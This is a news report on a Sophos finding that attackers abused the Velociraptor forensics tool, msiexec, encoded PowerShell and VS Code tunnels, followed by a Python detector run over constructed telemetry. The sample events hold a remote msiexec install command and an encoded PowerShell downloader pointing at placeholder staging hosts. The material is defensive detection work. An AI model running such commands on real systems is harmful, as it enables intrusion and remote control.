
Sophos cybersecurity specialists have highlighted a cyberattack in which unidentified threat actors used Velociraptor, the open-source endpoint-monitoring and digital-forensics tool.
“In this incident, the attackers used a tool to download and launch Visual Studio Code, likely with the intention of creating a tunnel to a command-and-control server under their control,” report experts from the Sophos Counter Threat Unit.
The report notes that attackers often employ living-off-the-land (LotL) tactics and use legitimate remote monitoring and management tools in their attacks; the use of Velociraptor, however, signals an evolution of these tactics, in which incident response software itself is turned to malicious ends.
As the analysis of this incident showed, the attackers used the Windows utility msiexec to download an MSI installer from a Cloudflare Workers domain, which also served as a staging platform for other tools used by the attackers, including the Cloudflare tunneling tool and the Radmin remote administration utility.

The MSI file was intended to deploy Velociraptor, which then established communication with another Cloudflare Workers domain. The access obtained was then used to download Visual Studio Code from the same intermediary server using an encoded PowerShell command and to launch it with tunneling enabled, in order to provide both remote access and remote code execution.
In addition, the attackers were observed reusing the Windows msiexec utility to download additional payloads.
“Organizations should monitor and investigate unauthorized use of Velociraptor and consider such tactics a precursor to the deployment of ransomware,” Sophos warns.
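Added example (not code from Sophos or Rapid7): a small Python detector, run over constructed endpoint telemetry, that flags the four observable steps of the chain described above, namely a URL-sourced msiexec install, the Velociraptor client contacting a server outside an allowlist, an encoded PowerShell command whose decoded body contains a download primitive, and VS Code started with the tunnel subcommand. The event dictionary shape, the allowlist and all domains are assumptions.

```python
import base64
import re

# Servers the organisation's own Velociraptor deployment may talk to (assumed allowlist).
APPROVED_VELOCIRAPTOR_SERVERS = {"velociraptor.corp.example"}

def decode_encoded_powershell(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or '' if absent/invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def check_event(ev):
    """Return the names of the detections one endpoint event (a dict) triggers."""
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("cmdline", "")
    hits = []
    if ev.get("event") == "process":
        if image == "msiexec.exe" and re.search(r"https?://", cmd, re.I):
            hits.append("msiexec remote MSI install")        # installer fetched from a URL
        if image == "code.exe" and re.search(r"\btunnel\b", cmd, re.I):
            hits.append("vscode tunnel launched")            # remote access via VS Code tunnel
        if image in ("powershell.exe", "pwsh.exe"):
            body = decode_encoded_powershell(cmd)            # inspect the decoded command
            if re.search(r"DownloadFile|Invoke-WebRequest|\biwr\b|WebClient", body, re.I):
                hits.append("encoded powershell downloader")
    elif ev.get("event") == "network":
        if image == "velociraptor.exe" and ev.get("dest") not in APPROVED_VELOCIRAPTOR_SERVERS:
            hits.append("velociraptor beaconing to unapproved server")
    return hits

def scan(events):
    """Map event id -> detections for every event that triggered at least one rule."""
    return {ev["id"]: h for ev in events if (h := check_event(ev))}

# Constructed sample telemetry modelled on the reported chain; domains are placeholders.
PS_BODY = "(New-Object Net.WebClient).DownloadFile('https://stage.workers.dev/code.zip','c.zip')"
ENCODED = base64.b64encode(PS_BODY.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "event": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://stage.workers.dev/v.msi /qn"},
    {"id": 2, "event": "network", "image": r"C:\Program Files\Velociraptor\Velociraptor.exe", "dest": "c2.workers.dev"},
    {"id": 3, "event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + ENCODED},
    {"id": 4, "event": "process", "image": r"C:\Users\Public\code\code.exe", "cmdline": "code.exe tunnel"},
]
```

Feeding `SAMPLE_EVENTS` to `scan()` flags all four records; a Velociraptor connection to the allowlisted server or a local-path msiexec install produces no hit.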
After Sophos published this report, the cybersecurity company Rapid7, which develops Velociraptor, released a document that details how organizational security teams can detect Velociraptor misuse in their environments.
“Rapid7 is aware of reports warning about the abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response tasks. But like many other security and administration tools, it can be used for harm if it falls into the wrong hands,” the developers commented.